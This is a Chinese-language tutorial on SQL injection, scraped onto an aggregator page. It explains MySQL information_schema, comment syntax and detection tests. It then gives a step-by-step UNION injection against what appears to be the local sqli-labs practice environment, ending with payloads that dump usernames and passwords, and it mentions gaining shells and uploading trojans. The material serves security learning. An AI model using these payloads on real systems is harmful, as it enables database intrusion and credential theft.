当前位置: 首页 > news >正文

怎么做网站黑链/seo公司推荐

怎么做网站黑链,seo公司推荐,有什么专门做电子琴音乐的网站,广州营销推广网站SQL注入的几张表:一、information_schema库:1、在mysql5.0版本后,默认数据库存放在这个数据库中,该库中常用的三个表schemata、tables、columns2、schemata表存储的是该用户创建的所有数据库中的库名,记录数据库的字段…

SQL注入的几张表:

一、information_schema库:

1、在mysql5.0版本后,默认数据库存放在这个数据库中,该库中常用的三个表schemata、tables、columns

2、schemata表存储的是该用户创建的所有数据库中的库名,记录数据库的字段名为schema_name

3、tables表存储该用户创建的所有数据库名和表明,库名和表明分别为table_schema,table_name

4、columns存储改用户创建的所有数据库的库名、表明、字段名,分别为table_schema,table_name,columns_name

二、数据库查询语句

格式:

需查询的值 A=select 所属字段名 A from 所属表名 where 对应字段名 B=值B

三、limit的用法

格式 limit n:m,其中n指的是记录开始的位置,从m=0开始,表示第一条记录,n是指取几条记录

四、常用的几个函数

version():当前mysql版本

database():当前使用的数据

user():当前mysql的用户

五、注释

1、#

2、-- + 空格

3、/**/   内联注释

4、/*!*/  强制内联注释

注:url里不能用#号

六、探测方法

1、注入探测:

自动方式:使用web漏洞扫描工具,发现注入点;

手工方式:手工构造测试语句发现注入点;

手工判断三步骤:

数值型:

and 1=1  true

and 1=2   false

字符型:

' and 1=1 --+  true

' and 1=2 --+  true or false

2、信息获取

环境信息:数据库类型,数据库版本,用户信息等

数据库信息:数据库名称,数据库表,字段,字段内容

3、获取权限

获取操作权限,数据库执行shell,上传木马

注:只要是带有参数的动态页面,都会存在注入的风险

七、Union注入攻击及代码分析

举例:

联合注入实现

http://127.0.0.1/sqli/Less/?id=1

第一步:判断是否存在sql注入漏洞

1、、http://127.0.0.1/sqli/Less-1/?id=1' 错误

2、、http://127.0.0.1/sqli/Less-1/?id=1 and 1=1 正常

3、http://127.0.0.1/sqli/Less-1/?id=1 and 1=2 正常

返回正常这里可以判断是字符型,那么构造字符型注入的payload

1、http://127.0.0.1/sqli/Less-1/?id=1' and 1=1 --+ 正常

2、http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 --+ 异常

从而可以判断此处存在sql注入漏洞,切入漏洞类型为数值型

第二步:判断数据表字段数

order by 1-99

http://127.0.0.1/sqli/Less-1/?id=0' order by 1 --+

第三步:判断查询输出的位置

http://127.0.0.1/sqli/Less-1/?id=0' union select 1,2,3 --+

第四步:脱裤,报数据库名 seccurity --

http://127.0.0.1/sqli/Less-1/?id=1' union select 1,2,database() --+

第五步:报表名  users

http://127.0.0.1/sqli/Less-1/?id=0' union select 1,2,

(select group_concat(table_name) from information_schema.tables

where table_schema='security') --+

第六步:报字段名  id,username,password

http://127.0.0.1/sqli/Less-1/?id=0' union select 1,2,

(select group_concat(column_name) from information_schema.columns

where table_schema='security' and table_name='users') --+

第七步:报数据

http://127.0.0.1/sqli/Less-1/?id=0' union select 1,2,

(select group_concat(id,0x3a,username,0x3a,password) from security.users) --+

http://www.lbrq.cn/news/1257787.html

相关文章:

  • 西宁做网站建设公司/搜索引擎排名google
  • 毕设代做网站招聘/软件优化
  • 网站建设logo/搜索引擎优化的作用是什么
  • 快盘WordPress/合肥seo招聘
  • 普通政府网站 多少钱/西安网站seo厂家
  • 西安网站建设huanxi/优化设计答案五年级上册
  • 做期货主要看哪个网站/百度推广首次开户需要多少钱
  • 网站备案账户名如何查询/西安seo网站排名
  • 深圳做网站建设的公司/国内优秀个人网站欣赏
  • 影响网站建设价格的因素有/高级搜索技巧
  • 全面的聊城网站建设/外链服务
  • 东莞网站推广多少钱/推广赚钱平台
  • 电商网站建设策划书/同城发广告的平台有哪些
  • 苹果商店app store/seo服务的内容
  • 建立文档/企业seo顾问服务阿亮
  • 北京微网站app/百度下载免费安装
  • 下载源码就能建网站吗/青岛网站设计公司哪家好
  • 成都卫健委最新通知/沈阳seo关键词
  • 开原铁岭网站建设/贵阳网络推广外包
  • 濮阳做网站的公司/深圳网站关键词优化公司
  • 云南热搜科技有限责任公司/seo在线培训机构排名
  • 安阳百度网站制作多少钱/网站seo站外优化
  • 中山网站建设收费标准/万江专业网站快速排名
  • 做网站 给图片加链接/网站制作策划
  • 哪里可以做期货网站平台/小视频关键词汇总
  • 昌黎网站建设/seo赚钱培训
  • 百度地图怎么放在网站上/加盟教育培训哪个好
  • 如何创网站/应用商店下载安装
  • 求个网站2021/线上营销的方式
  • 建设工程168网站/营销 推广
  • Solidity智能合约基础
  • 7、Redis队列Stream和单线程及多线程模型
  • Claude Code六周回顾
  • 8月4日星期一今日早报简报微语报早读
  • C++高频知识点(十四)
  • app-1